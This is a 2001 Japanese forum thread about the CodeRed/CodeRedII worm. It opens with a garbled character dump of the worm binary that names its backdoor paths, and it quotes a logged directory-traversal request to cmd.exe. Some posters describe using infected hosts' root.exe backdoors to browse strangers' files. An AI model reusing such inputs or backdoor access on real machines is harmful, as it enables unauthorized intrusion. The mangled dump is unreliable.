変換したらこうなった


ササ `ナE テナEdg?6 dgナE ヒ? h 釉\悃抉拔咲ナE悃抉拔ナE@ナE粡X悃撈UナE ス= ・
ユ所粡T悃昴uナ~0ナE ナE ォF0ナE ナE
CodeRedII ナE$拔伺 ソ?ヨ8悃抬ナE悃? j 釉P悃抉
釉8悃抉絋挾晝ム ト?8悃掖hS拔拳UナEEナET悃?, ナE, ヒウ 溜リォ礑4蹙ナEj 掎ナE ナE
撈挧 j 拔姫拔ュOuウナE iT悃? \&ナE \&W拔ヒj j拔號撈Uヒホ倥F4)EナEd拔ヒ酣E悃抉拔ソ?ナE悃?=ウ sヲ?ナE悃敘E
s?fォナE撈? fォナE撈? Pヒd 竡t撈挧 jj拔スナE掖レ礒トjTh~fト掎ト拔ァYj釉p撈抉掎ト拔Μ ソtK3、拔ナE3' u?ォナE撈?
ォナE撈? ォナE撈? 絋ト籔d撈晉ヨh撈抉j 釉`撈抉j j拔ン?j Th~fト掎ト拔ァYナEu1 X-イ
j hナE P掎ト拔ィ=ナE uj j釉\悃抉掎ト拔ョ掎ト拔・ネチ悃擡 購ナE ナE xuェ 娩`ナE 綸$
dgナE XaナEdg?6 dgナE fナEMZu薙K<ナE PE uラ綉 xイ紕 ナEKERNu嫁|EL32uェ3蟹縒 ロクAでE
GetPu槐|rocAuナEJI暁EJ$? 。ナEJナE 遺D$$dgナE Xa依Q撈昶]ナEEッヒ
LoadLibraryA ?
uナEUッ礒ルヒ
CreateThread 掎ナEUッ礒瞥
GetTickCount 掎ナEUッ礒ナE Sleep 掎ナEUッ礒ヒヒ
GetSystemDefaultLangID 掎ナEUッ礒藩 GetSystemDirectoryA 掎ナEUッ礒
CopyFileA 掎ナEUッ礒ミナE GlobalFindAtomA 掎ナEUッ礒芝E GlobalAddAtomA 掎ナEUッ礒固E
CloseHandle 掎ナEUッ礒ュナE _lcreat 掎ナEUッ礒テナE _lwrite 掎ナEUッ礒サナE _lclose ?
uナEUッ礒淒E GetSystemTime 掎ナEUッ礒ソナE WS2_32.DLL 拔ル礒コナE socket 掎コ?
Uッ礒スナE closesocket 掎コ拔ッ礒・ナE ioctlsocket 掎コ拔ッ礒ァナE connect 掎コ?
Uッ礒ηE select 掎コ拔ッ礒ンナE send 掎コ拔ッ礒ィナE recv 掎コ拔ッ礒ョナE gethostname 掎コ?
Uッ礒才 gethostbyname 掎コ拔ッ礒射 WSAGetLastError 掎コ拔ッ礒 USER32.DLL ?
Uル礒?ヒ ExitWindowsEx 掎ナEUッ礒蛻絋ナEソナE@礒ム酣ExV4落。ソ依キ撈?< tナE掖ロ依フ撈?
莟ヒハ撈昜治ナEヒミ撈昜ッヒケ撈昜射・撈敘E ナE 撈撈 撈? 撈? 撈? 撈? 撈 撈 撈YナEナE似ュ#
ナE悃? 柴ナEtスト夾tナE珊悃掖、h 釉\悃抉拔コ\悃敘E \CMD.EXE ^ナEァ?cjナE
d:\inetpub\scripts\root.exe ナE$ナE釉\悃抉拔ミjナE d:\progra~1\common~1\system\MSADC\root.exe
ナE$ナE釉\悃抉拔ミヒ? ナEZP 撈 ス @
620名無しさん@お腹いっぱい。:2001/08/13(月) 07:29
M$の提灯持ちPC雑誌は今回の事なんて書くかな。
まさかCodeRedは初心者には無関係の事件でした、とか書くなよ。
現実に迷惑なM$の事実を何にも書かないPC雑誌も同罪なんだよ。
どうせまたCodeRedは無視してXPXP初心者もXP!、とかなんだろうな。
621名無しさん@お腹いっぱい。:2001/08/13(月) 07:55
>>615
本来はログに残らないワーム本体だね。GETが無いやつと同じ
ようなものかも。
622名無しさん@お腹いっぱい。:2001/08/13(月) 08:00
>>620
雑誌は小手先のテクニックを伝えるのが精一杯。
雑誌がどう書こうがユーザーの意識が変わらなきゃダメなわけ。
623名無しさん@お腹いっぱい。:2001/08/13(月) 08:05
>>620
Code Red に関することには一切触れなかったりして・・・
624名無しさん@お腹いっぱい。:2001/08/13(月) 08:05
>> 620

NHKニュースの報道とかさ、CNNとかさ、

「一般のユーザには関係ありません」とか
「ダイアルアップで接続している方には影響ありません」

なんて言ってたじゃん。

これって正しくないよね、特に日本では。

無知な Windows ユーザが IIS を使ったりさ、アプリ
ケーションの都合で本人が意識しないで使ってたりさ、
一般のダイアルアップユーザが被害広げてるんだもんな。

日本のパソコン雑誌では取り上げないんじゃないかな。

そもそも、MS製OSがどうしてセキュリティに弱いのかって
事は、パソコン雑誌ライターのほとんどには分からないと
思うよ。せいぜい「よく使われているからセキュリティの
問題が発見されやすい」って思う程度で、構造的な問題、
設計上の問題は理解できないだろう。

いま原稿料安いから、ライターには、技術的に優秀な人っ
て少なくなっちゃってるし、今までの実績から、
あまり雑誌には期待しない事にしてるけど、

たとえば、MS製OSの問題点を明確的確に指摘して、
セキュリティを向上させる方法、用途によっては他のOSを
使用する提案なんかを書いた特集でも組めば見直すけどね。
625名無しさん@お腹いっぱい。:2001/08/13(月) 08:49
広告費の20%をM$に依存している以上、PC雑誌にM$批判は載らないだろ
パッチを当てない奴が悪いって記事になるに10000ペリカ
626え〜ん:2001/08/13(月) 09:19
>>624
>NHKニュースの報道とかさ、CNNとかさ、

>「一般のユーザには関係ありません」とか
>「ダイアルアップで接続している方には影響ありません」

>なんて言ってたじゃん。
この辺詳しく説明しておいたYO

これって正しくないよね、特に日本では。
627名無しさん@お腹いっぱい。:2001/08/13(月) 10:06
> NHKニュースの報道とかさ、CNNとかさ、
> 「一般のユーザには関係ありません」とか
> 「ダイアルアップで接続している方には影響ありません」

それって、誰が言ってたの?アナウンサー?
628名無しさん@お腹いっぱい:2001/08/13(月) 10:34
root.exe 使って \Program Files 覗いたら
2chブラウザ っていうディレクトリが出てきた (藁
629名無しさん@お腹いっぱい:2001/08/13(月) 10:39
こんなん来た。
203.69.225.146 - - [13/Aug/2001:06:22:29 +0900] "GET /scripts/..%255c..%255cwinn
t/system32/cmd.exe HTTP/1.0" 404 304

自動サーチかなあ。
630名無しさん@お腹いっぱい。:2001/08/13(月) 10:42
今回もそうだがチャイニーズvsヤンキーの泥仕合は世界中の無関係な人間に迷惑かけすぎ。
なにが停戦だよ。ガキの戦争ゴッコに社会人を巻き込むな。
隣接IPはこっちにも相手にもすげー迷惑。
631名無しさん@お腹いっぱい。:2001/08/13(月) 10:56
管理者の方々おつかれさまです。

赤丸でかくなっているじゃん。
北海道のとさかも隠れちゃった。
632名無しさん@お腹いっぱい。:2001/08/13(月) 10:58
混乱ついでに、ワームがあけたバックドアからNAPサーバーを
どんどん送り込む新ワームなんか出てくると楽しいかも。

攻撃しっぱなしより、サーバーのほうがましだよね>被害者??
633名無しさん@お腹いっぱい。:2001/08/13(月) 11:23
>>624
ある種のルータには buffer overflow の副作用が出て、SINET
とか WIDE も部分的に止まってたし。被害がないってのは、目
に見えるようなかたちでないってだけで、ないわけはないのよ。
うん。
634名無しさん@お腹いっぱい。:2001/08/13(月) 11:27
>>607, >>629
感染してるマシンの IP address 公開すんのはやめようよ。それって裏口の
あるマシンを公開してるのと同じことなんだし。悪用できるサーバを公表し
てたって、火を消すんじゃなくて油注いでるようなもんだよね。
635名無しさん@お腹いっぱい:2001/08/13(月) 11:34
感染してるマシンに root.exe 使って知らせる良い方法はありませんか?
もう、ウンザリです。
636名無しさん@お腹いっぱい:2001/08/13(月) 11:36
>>634
公表してるのはcode redを送出してる方と思われ。
ログとか公開してる↓こんな所に大量にあるよ。
http://www.alec.ac.jp/~akimichi/codered_sites.txt
637名無しさん@お腹いっぱい:2001/08/13(月) 11:37
>>635
メール(藁
638名無しさん@お腹いっぱい。:2001/08/13(月) 11:37
公開しなくても自動的にどんどん新しいのが来るんだよね(;´Д`)
>634
639名無しさん@お腹いっぱい:2001/08/13(月) 11:41
>>637
それができりゃ苦労はない (藁
相手のメールアドレスが分からないので困っています。のだ。
640NAP@腹減った:2001/08/13(月) 11:44
やっぱcode redの仕様が最後にnap鯖とかmx鯖になって終了
ということになってれば良かったんじゃないかと・・・
641名無しさん@お腹いっぱい。:2001/08/13(月) 11:50
>>635
過去ログを読みましょう
デスクトップに警告文名のフォルダ作ったら即効で接続きられたよ(w
642名無しさん@お腹いっぱい:2001/08/13(月) 11:55
>>641
ありがとうございます。やはりそれしか無いですかねぇ・・
ちょっと躊躇していたのですが、試してみます。
643名無しさん@お腹いっぱい。:2001/08/13(月) 11:57
解決にはならんと思うけど、少なくとも日本にある感染IISについては
3回の警告の後、強制代執行によりformatってのはどんなもんでしょう。
644名無しさん@お腹いっぱい。:2001/08/13(月) 12:01
>>643
formatはできないんだってばよ。
645名無しさん@お腹いっぱい。:2001/08/13(月) 12:03
「うちは、Index Service止めてるから大丈夫」
という話をよく聞く。大丈夫じゃないよ・・・

でもさ、「うちは、Linux/BSDだから大丈夫」とか言ってるやつも同じ意識レベルだよ。
646名無しさん@お腹いっぱい。:2001/08/13(月) 12:04
んじゃregedit?
>>644
647名無しさん@お腹いっぱい。:2001/08/13(月) 12:14
>>「うちは、Index Service止めてるから大丈夫」
>>という話をよく聞く。大丈夫じゃないよ・・・

うっ。そうなの?
最初は、一時回避策としてそうするつもりだった。
やばかった。
結局、IISはすべて止めちゃったけど。
648名無しさん@お腹いっぱい。:2001/08/13(月) 12:35
NIFTYのページの

>7月31日に出現した「CODE RED」はWebページの改竄を行うワームです。
>Windows NT 4.0 または Windows 2000 システムにおいて
>IIS が動作しているコンピュータ の場合は、対応が必要になる場合もございます。

これってなんか違うんでないかい?
出現は20日かそれ以前だし、Win9x系も対象なんじゃなかったっけ?
649名無しさん@お腹いっぱい。:2001/08/13(月) 12:53
Apacheで送ってきた相手のlocalhostにリダイレクトさせて、ついでに
ディスクトップにフォルダを作るようにできるんじゃないかな?
試してないけど。
650名無しさん@お腹いっぱい。:2001/08/13(月) 13:28
plalaとhi-ho、最悪・・・
651名無しさん@お腹いっぱい。:2001/08/13(月) 14:06
何か奇怪な現象が・・・
08/13/01 13:29:43 OK 61.142.51.* 80
08/13/01 13:29:45 OK 61.142.51.* 80
08/13/01 13:29:50 OK 61.142.51.* 80
08/13/01 13:32:23 OK 61.183.34.* 80
08/13/01 13:32:25 OK 61.183.34.* 80
08/13/01 13:32:26 OK 61.183.34.* 80
08/13/01 13:42:32 OK 61.156.20.* 80
08/13/01 13:42:33 OK 61.156.20.* 80
08/13/01 13:42:34 OK 61.156.20.* 80
08/13/01 13:48:52 OK 61.150.181.* 80
08/13/01 13:48:55 OK 61.150.181.* 80
08/13/01 13:49:02 OK 61.150.181.* 80
08/13/01 14:00:23 OK 61.116.13.* 80
08/13/01 14:00:25 OK 61.116.13.* 80
08/13/01 14:00:30 OK 61.116.13.* 80
同じIPアドレスに3回アタックするようにワームコードが改造されたか?
652名無しさん@お腹いっぱい:2001/08/13(月) 14:17
>>651
普通だよ。
653パイパーペラーポ:2001/08/13(月) 14:19
>> 606

どこですか?
なんかパッチあてても駄目みたいなんですよー
しばらくするとまたメモリ内に、、ちょっとした悪夢てす。
654パイパーペラーポ:2001/08/13(月) 14:20
>>606

こうか。
655名無しさん@お腹いっぱい。:2001/08/13(月) 14:24
>>652
普通なのか・・・
今日の一時頃から急にこうなったもので。
656名無しさん@お腹いっぱい。:2001/08/13(月) 15:54
M$はイってる。
657名無しさん@お腹いっぱい。:2001/08/13(月) 16:03
M$Nいっとるね。
Pingもかえらん。
658名無しさん@お腹いっぱい。:2001/08/13(月) 16:12
D:\>tracert 207.46.176.152

Tracing route to msn.com [207.46.176.152]
over a maximum of 30 hops:

1 <10 ms 10 ms <10 ms air [******************]
中略
10 181 ms 180 ms 170 ms iuscmdistc1206-p-7-0.msft.net [207.46.190.117]
11 160 ms 170 ms 161 ms iuscsecurc1204-ge-6-0.msft.net [207.46.129.178]

12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
後略

ご冥福をお祈りします (プッ
659名無しさん@お腹いっぱい。:2001/08/13(月) 16:29
>>656-658

共にWebは見れるよ。
pingは返ってこなかったが、
そういう設定なんじゃない?もとから
660名無しさん@お腹いっぱい。:2001/08/13(月) 16:31
>>659
漏れんとこからも駄目。
リロードしても表示される?
661名無しさん@お腹いっぱい。:2001/08/13(月) 16:34
662名無しさん@お腹いっぱい。:2001/08/13(月) 16:37
>>659
今治った。
663名無しさん@お腹いっぱい。:2001/08/13(月) 16:45
http://www.microsoft.com/japan/technet/security/codealrt.asp
このサイト公開日が7月31日になっているが、
内容はえらく更新されて無いかぁ?
664名無しさん@お腹いっぱい。:2001/08/13(月) 17:31
>>663
一番下に↓って書いてるよ。
終更新日:2001 年 8 月 11 日
665名無しさん@お腹いっぱい。:2001/08/13(月) 17:32
>>664
そーゆうところが、MSらしくて(ハート)、見逃していました。
666名無しさん@お腹いっぱい。:2001/08/13(月) 17:49
マスコミは公共の安全のためMSの不良品に注意するよう、
広く伝える義務があるのに、まったく存在価値無し。
667名無しさん@お腹いっぱい。:2001/08/13(月) 17:55
だって、MSってスポンサーなんだもん。
668名無しさん@お腹いっぱい。:2001/08/13(月) 18:00
>>661
おお重い・・・
半分以上はK国じゃないの?
669名無しさん@お腹いっぱい。:2001/08/13(月) 18:17
M$は存在自体悪です。
670名無しさん@お腹いっぱい。:2001/08/13(月) 18:20
>>668
おまえもその一人だよ。
クリックするな。
671名無しさん@お腹いっぱい。:2001/08/13(月) 19:03
そろそろ赤虫限定電波系ホームページが出て来てもいい頃なんだが、
なかなか見つからん。
672名無しさん@お腹いっぱい。:2001/08/13(月) 19:48
コードレッドをサーバから完全に駆除する方法ってありますか?
例のセキュリティパッチをあてて、再起動してもしばらくするとまた動き始めます。
パッチをあてて、再起動するだけじゃ駄目なのでしょうか?
673名無しさん@お腹いっぱい。:2001/08/13(月) 19:50
>>672
OSは?
674名無しさん@お腹いっぱい。:2001/08/13(月) 19:54
Windows 2000 Server と、 Windows 2000 Advanced Server です。
もちろん、SP2は適用済みです。
セキュリティパッチをあてて安心していたのですが、
全然駄目でした。時折返事しなくなります。
ほっとくか、再起動で直りますが。。
675名無しさん@お腹いっぱい。:2001/08/13(月) 19:59
>>674
およよ、本当にそのサーバが感染しているのか確かめた方が
良いです。(新種かなぁ…)
どうしても再感染するようなら、スクリプトマッピングを全部
外してみてください。
676名無しさん@お腹いっぱい。:2001/08/13(月) 20:06
>>673
「しばらくすると動き出す」んじゃなくて、
再感染してんじゃねの?
677名無しさん@お腹いっぱい。:2001/08/13(月) 20:06
存在の有無はトレンドマイクロの自動駆除ツールを使用して
確認しました。パッチをあて、再起動後しばらくは居ないのですが、
数分後にもう一度ツールを走らせると、出てきます。
ida,idqのスクリプトマッピングは削除済みです。
ログをみても特に亜種の形跡はないです。
いわゆる、「default.ida XXXXX〜」が数回残ってる位です。
678名無しさん@お腹いっぱい。:2001/08/13(月) 20:12
>>677
MSのセキュリティパッチ(SP2に更に当てる奴)当てた?
駆除ツールは駆除してくれるだけだよ。
でも、マッピング削除して感染するのがよー分からん。
パケット観察してみるがよろし。

てか、アドバンスサーバ持っているって事は大きなところ
なんだろうから、サポート呼び出しが一番かも。
679名無しさん@お腹いっぱい。:2001/08/13(月) 20:12
ネットワークカードを2枚挿して、
パブリックとプライベートを分けて管理していて、
始めはそれが問題なのかと思い、
内側のネットワークから切り離しても駄目でした。

ネットワークから切断

パッチをあてる&駆除ツール

再起動

駆除ツールで居ないのを確認

外側のネットワークのみ接続

数分後に感染

って感じです。
680名無しさん@お腹いっぱい。:2001/08/13(月) 20:16
>>677 さん

もちろんセキュリティパッチはあててあります。
存在の有無の確認に駆除ツールを使用しています。
でかくはないです、中小です。
で、わたくし、じつはサポートだったりします。(恥
681名無しさん@お腹いっぱい。:2001/08/13(月) 20:16
>>679
トレンドの駆除ツールの動作がよーわからんので、
詳しい人お願いします。

単純に攻撃を受けてるだけだったりしないのかなぁ…
682名無しさん@お腹いっぱい。:2001/08/13(月) 20:19
root.exeの有無はどうなんでしょう?
683名無しさん@お腹いっぱい。:2001/08/13(月) 20:24
あとスクリプトマッピング全部はずしてみるとか。
これで感染しないとなると、新種だな。
684680:2001/08/13(月) 20:25
>>678 さんでした。訂正します。

はあ、お腹空きました。

>>681 さん

 攻撃を受けるだけで、沈黙しちゃうんでしょうか?
 沈黙中はピンも通りません。外側のネットワークのみ使用不能です。
 なので、再起動やら、サービスの再起動くらいは可能なんです。
 ほっとくと復帰しますが、おそらくその時間、
 皆様にご迷惑をお掛けっぱなし、かと思われます。すみません。
685名無しさん@お腹いっぱい。:2001/08/13(月) 20:29
いままでのcode red/IIの動作と違く見えるねえ。
なにか勘違いが入っているのではないかと思うんだけど。
686名無しさん@お腹いっぱい。:2001/08/13(月) 20:29
>>684
物凄い量パケット飛び交っているからねぇ…回線の状況とかによっては
ありえるし、でも詳しいことあんまりここに書けないと思うから、
パケットモニターを見るのが一番。
内部で山のように感染していて、それが原因だったりまぁ色々あるし。
687680:2001/08/13(月) 20:30
>>682 さん

把握している限りではバックドアの生成は今まで無いです。
そのあたりの状況は目視、および駆除ツールのログで確認済みです。

>>683 さん

使用しているスクリプト以外は外せますが、実際稼動しているので
難しいかと思われます。

こういうふうにお話を聞いていると、
皆さんの場合はパッチが効いてそれ以降は問題ないようですね。
セキュリティパッチをあてて、再起動するとコードレッドの脅威は基本的には去る、
との認識で間違っては居ないですよね??
688名無しさん@お腹いっぱい。:2001/08/13(月) 20:34
>>687
>セキュリティパッチをあてて、再起動するとコードレッドの脅威は基本的には去る、
そのホストに関してはね。

>把握している限りではバックドアの生成は今まで無いです。
もう動作が全然ちがうので、逆にワクワクしてます(ごめんね)

貴社の先輩とかで、詳しい人に連絡とってみるがよろしぃ。
こういっては失礼かも知れませんが、680さんの力量を超えていると
思うなり。
689名無しさん@お腹いっぱい。:2001/08/13(月) 20:35
パッチを当てても既にバックドアが作られている場合、バックドアが
残ってしまうというのは過去ログとか、>>1-2の資料にあるから
知っているよね?

駆除ツールのログで感染を確認というのがなんか、怪しいような
その辺が変なんじゃないかと思える。
690名無しさん@お腹いっぱい。:2001/08/13(月) 20:38
>>689
同感。駆除ツールの使い方(ログの読み方)が不味いのかも?>680
691名無しさん@お腹いっぱい。:2001/08/13(月) 20:40
使ってるのがこれ
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
ならバックドアの始末はしてくれるみたいだねえ。
692680:2001/08/13(月) 20:44
たとえばの話ですが、
Aサーバ、BサーバとIISが動作しているサーバが2台あって、
そのうちの1台Aサーバはインターネットへ繋がっているとします。
で、そのAサーバは2枚のNICによりプライベートなアドレスも持っていて、
内側でもう一台のBサーバとドメインを形成しているとします。
Aサーバに対策をしていない場合、Aサーバはワームに感染しますが、
その後、裏側で繋がっているプライベートなBサーバへの感染は
ありえることなのでしょうか?この場合はなんかありえそうですね。

で、その双方にセキュリティパッチをあて、再起動すると、
パッチをあててることにより、ワームは居なくなりそうな気がします。
でもパッチ自体がポート80からの侵入のみ防ぐもので、
別のポートからの侵入(ドメイン内なのでなんでもありです。)が可能なら、
そうもいかないですね。。

内側から切り離したサーバでも駄目だったらそれだけではないでしょうけれど。。
693名無しさん@お腹いっぱい。:2001/08/13(月) 20:47
CodeRedもウザイが
盆踊りもかなりウザイと思う田舎モンのおれ。
694名無しさん@お腹いっぱい。:2001/08/13(月) 20:47
もしかして誤検知じゃないかな。
695名無しさん@お腹いっぱい。:2001/08/13(月) 20:49
>ありえることなのでしょうか?
無茶苦茶ありえます。てか、そんな環境で大丈夫なの?
とユーザでも社内でもない人間に説教たれたくなります。

>ドメイン内なのでなんでもありです。)
ちょっと勘違いとかも有るようなので、このスレと過去スレ全部読んでみる
がよろしぃ。

ちなみにどこの会社?なんてこと言いたくなってきました(藁
696680:2001/08/13(月) 20:49
>>688 さん

頼れそうな人が長い夏休みで音信普通です。寒いです。

>>689 >>690 さん

居る場合と居ない場合の違いと、簡単な英語でのログなので、
多分問題無いかと思われます。

>>691 さん

そうです。それです。
697名無しさん@お腹いっぱい。:2001/08/13(月) 20:50
698名無しさん@お腹いっぱい。:2001/08/13(月) 20:54
ケーブル外した状態で、リブートしなおして、再び駆除ソフトで
確認して、駆除ソフトが、「虫がいる、いるよぉ、」って言ったら
誤検知と思われ。別の会社の検知ソフトも使ってみるべきかも。
699名無しさん@お腹いっぱい。:2001/08/13(月) 20:56
あと、駆除ツールも本当に最新版かもう一度確認してみそ。
700680:2001/08/13(月) 20:58
>>695 さん

ごめんなさい〜('_`)
、上司にぶっとばされそうなので会社名は言えません。

えー、、ということは、、
パッチをあてても、全然抑止力になってないってことですか。

あれ?でも、内側のネットワークから隔離した(物理的にも)
サーバにも感染してました。

ネットワークから切断(パブリック、プライベート双方)

パッチをあてる&駆除ツール

再起動

駆除ツールで居ないのを確認

外側のネットワークのみ接続

数分後に感染

これはありえませんか??
701名無しさん@お腹いっぱい。:2001/08/13(月) 21:02
>>696
その頼れそうな人って、イッチーですか?
いや、昔俺がいた会社みたいだぁ(藁

>>700
一応手順が本当にしっかりしていれば、そのホストに関しては
無いはずです。ですが、内部ネットワークはもうボロボロになっている
と思われるので、そっちの心配もして欲しいです。
702名無しさん@お腹いっぱい。:2001/08/13(月) 21:04
最近海外から来るの、APNICで調べるとどれもKORNETとCHINANETなんだけど、
ひょっとしてあれらの国ってこの2つしか無いの?
703 :2001/08/13(月) 21:07
>>697 さりげなく見てみたんですけど、、、

ネタですよね? がいしゅつ?
704名無しさん@お腹いっぱい。:2001/08/13(月) 21:07
>>702
APNICでは国単位でしか管理してなくて、
各国の個別データベースに行かないと分からなかったような気がします。
705680:2001/08/13(月) 21:08
>>701 さん

残念ながらイッチーさんという方ではないです。
バカンスから帰ってきたら何か言ってやりたいのですが、
怖いひとなので止しておきます。

了解いたしました。
もうちょっと落ち着いて状況を把握してみようと思います。

おそらく、内側から隔離したサーバへの感染が偶然として、
内側で繁殖してるのでパッチをあてたサーバにも感染してるということにします。
とりあえず、今日は寝れなさそうなので、またあとで遊びに来ます。
まずは、ラメーンか何かで腹ごしらえをしてきます。
706名無しさん@お腹いっぱい。:2001/08/13(月) 21:13
おひおひ帰ってしまうのか。
大丈夫なのか、せめて外部につながる回線は切ってから
帰って欲しいぞ。
707名無しさん@お腹いっぱい。:2001/08/13(月) 21:33
どれぐらいの規模なのかしらないけど、
感染してる疑いがあるなら、ネットから完全に切り離してくれ。
業務に支障がでようが関係ないから切り離せ。
「感染しちゃった、あはは」じゃ済まないんだから。
708名無しさん@お腹いっぱい。:2001/08/13(月) 21:52
アドバンスドサーバ持って(導入させといて)、このレベルのサポートって…
709名無しさん@お腹いっぱい。:2001/08/13(月) 21:56
A:ガコガコで気づいてくれないので、
routeで切断して差し上げました。

インタネットに繋がらなければ気づいてくれるでしょう。
710名無しさん@お腹いっぱい。:2001/08/13(月) 22:05
680は、ウィルスとワームの区別が付いていないと思われ。
711606:2001/08/13(月) 22:06
いまさらだけど、
>>653-654
このへん >>161
今分かっている状況としてはパッチを当ててもだめなのはIIS4
なんだよな。
ちょっと上の奴もふくめて、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
のメモリ内のcode redIIチェックが馬鹿でログの中にcode redIIの
Getアクセスがあったりすると、いるいる、いるよ〜、と反応している
んじゃないかと思ったりする。
712名無しさん@お腹いっぱい。:2001/08/13(月) 22:10
とりあえず、ひたすら netstat -anしてみて
よそ様の80ポートをアクセスしていないかを
確認してみるのも安心する手になる....かな。
713え〜ん:2001/08/13(月) 22:13
そろそろ出るかもしれんのでツクタヨ
http://www.nefty.net/desktop/haritsuke/img-box/img20010813221142.gif
714腹へった:2001/08/13(月) 22:16
>>713
楽しいヤツだな。
715名無しさん@お腹いっぱい。:2001/08/13(月) 22:17
>>711
うーんとこれはNT4.0の場合じゃないの?
確かにどっちとも取れると思うけど。
W2kの一番初めはIIS4だっけ?
716名無しさん@お腹いっぱい。:2001/08/13(月) 22:18
Win2000proでIndexingserviceは停止しています。
シマンテックのツールで感染していないことを確認しSp2にパッチを当てパーソナルFirewallを動かしているのですが、
ここを読んでいるとIndex Service止めるだけじゃ駄目とあります。
少なくともCodeRed2に関してはこれで大丈夫ではないでしょうか?
日に数百アタック受けていますが今のところ問題ありません。
717名無しさん@お腹いっぱい。:2001/08/13(月) 22:20
>Sp2にパッチを当て
これをちゃんとやってるなら、INDEXサービす動かしてもいいよ。
718名無しさん@お腹いっぱい。:2001/08/13(月) 22:22
>>709
routeイイネッ
719名無しさん@お腹いっぱい。:2001/08/13(月) 22:23
>>717
得体の知れないSP2やパッチなんか入れられない。って人が緊急避難的にインデックスサービス止めてネットに繋ぐのは危険ですか?
720名無しさん@お腹いっぱい。:2001/08/13(月) 22:25
>>715
 だから、IIS4以外でパッチを当てているのに再び感染する
 という状況は、今現在知られている範囲ではありえない。
 と、言いたかったんだけど。
721名無しさん@お腹いっぱい。:2001/08/13(月) 22:25
>>719
その場合はスクリプトマッピングを外さないと駄目。
てか、この期に及んでそんなこと言うな、諦めてSP2とパッチ当てろ。
得体の知れないOSなんだから(藁
722名無しさん@お腹いっぱい。:2001/08/13(月) 22:26
>>720
了解です。自分もちょっとどっちかなぁって悩んでいたもので。
680君の登場もあったし…
723名無しさん@お腹いっぱい。:2001/08/13(月) 22:27
インデックスサービスを止めるってのは何の意味もないの。
IISに対して.idqや.idaという拡張子を持った要求をされた場合に
idq.dllを呼ぶようにアプリケーションマッピングされているのが
問題になるので、やるならアプリケーションマッピングの解除なの。
って>>1のリンク先に書いてあるのに。
724名無しさん@お腹いっぱい。:2001/08/13(月) 22:27
>>>721
横レスですみませんがスクリプトマッピングのはずし方を教えてください。
このような質問がうざいのは百も承知ですが、事が緊急を要しますので初心者板行けとか過去ログ読めとかなるべく言わないでほしいのですが。
725名無しさん@お腹いっぱい。:2001/08/13(月) 22:29
>>2>>3
MSへのリンク読め。ダイアログのコピペ付きで解説してある。
ここで文字で聞くよりいいぞ。
726名無しさん@お腹いっぱい。:2001/08/13(月) 22:29
>>724
4. 見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
  すぐに↓をチェック!
 http://www.microsoft.com/japan/technet/security/codeptch.asp


あんたにとって緊急でも、それに対してサービスする義務の
ある人はここにはいない。
727名無しさん@お腹いっぱい。:2001/08/13(月) 22:30
>>725
ご丁寧にありがとうございます
728名無しさん@お腹いっぱい。:2001/08/13(月) 22:30
>>724
過去ログ読め(藁
729名無しさん@お腹いっぱい。:2001/08/13(月) 22:33
>事が緊急を要しますので
ずいぶんゆっくりした緊急事態。今日は8月13日。南無ぅ〜♪
730名無しさん@お腹いっぱい。:2001/08/13(月) 22:39
>>1の一番最初にあるリンク先も読まずに、やりかたを説明しろ
とかいう人間はどんな育ちかたをしたのかちょっと興味があるなあ。
731名無しさん@お腹いっぱい。:2001/08/13(月) 22:41
>>730
繰り返すようだけど、昔いた会社がオーバラップする。
世の中こんなものなのかなぁ…
732え〜ん:2001/08/13(月) 22:48
733名無しさん@お腹いっぱい。:2001/08/13(月) 22:50
元気になったありがとう
734名無しさん@お腹いっぱい。:2001/08/13(月) 22:50
>>732
これまた、イイ画像持ってるネ!
735名無しさん@お腹いっぱい:2001/08/13(月) 22:50
736名無しさん@お腹いっぱい。:2001/08/13(月) 22:53
>>732
五十嵐先生 ハァハァ・・・
737名無しさん@お腹いっぱい。:2001/08/13(月) 22:53
>>731
そんなものだ。
そうなるようにM$が仕向けたんだけどな。GUIで簡単設定とかいって。
本質もわからずに設定できるわけないじゃん。
738名無しさん@お腹いっぱい。:2001/08/13(月) 22:55
>>732
その亜種なら幾らでも来てほしいぞ。
739名無しさん@お腹いっぱい。:2001/08/13(月) 22:58
740名無しさん@お腹いっぱい。:2001/08/13(月) 22:59
741名無しさん@お腹いっぱい。:2001/08/13(月) 23:06
みんな疲れてきてるみたいね・・・・
赤虫の作者は反省しる!
742え〜ん:2001/08/13(月) 23:08
>>734
全セットでね  ニヤリ
743名無しさん@お腹いっぱい。:2001/08/13(月) 23:09
「反省しる」ってなんだ?
krからのアタックか?
744え〜ん:2001/08/13(月) 23:10
>>743
ここ見た?>>740
745名無しさん@お腹いっぱい。:2001/08/13(月) 23:11
>>1のリンク先読みましたが、そこの説明にある管理ツールの中にインターネットサービスという項目がありません。
これはインデックスサービスをインストールしないと出てこない項目なんですあか?
746名無しさん@お腹いっぱい。:2001/08/13(月) 23:12
Yahoo!BBにもっと細かい情報開示を要求しる!
http://salami.2ch.net/test/read.cgi?bbs=isp&key=995733300
747え〜ん:2001/08/13(月) 23:12
たまにいい画像あるからさらす。
http://www.nefty.net/desktop/haritsuke/imgboard.cgi
748名無しさん@お腹いっぱい。:2001/08/13(月) 23:13
>>745
 IISをインストールしないと出ないこうもくなんでよす。
749名無しさん@お腹いっぱい。:2001/08/13(月) 23:13
誰か書く前に書いておこ〜っと。
反省汁
750名無しさん@お腹いっぱい。:2001/08/13(月) 23:15
>>745
君は誰だ?
751名無しさん@お腹いっぱい。:2001/08/13(月) 23:15
ヌード写真一枚で動揺してはいかん。
スレの雰囲気がかわってしまっているぞ。
752え〜ん:2001/08/13(月) 23:17
>>751
反省してます!
753名無しさん@お腹いっぱい。:2001/08/13(月) 23:19
754うわ、:2001/08/13(月) 23:20
反省汁しらないのか?本当に反省したときだけ、さきっぽから出るんだぞ。
755名無しさん@お腹いっぱい。:2001/08/13(月) 23:23
>>753
 いっぱい見つけてきたのは偉いと思うが、それはブラクラの
 スレじゃないと面白くないってばよお。
756うわ、:2001/08/13(月) 23:24
>>747
ノリカのイイ。
757名無しさん@お腹いっぱい。:2001/08/13(月) 23:25
>>755
ブラ=ブラジャー
758名無しさん@お腹いっぱい。:2001/08/13(月) 23:26
>>757
 わかってるよ、下のどこかのブラクラのスレでみたよ。
759名無しさん@お腹いっぱい。:2001/08/13(月) 23:27
>>744
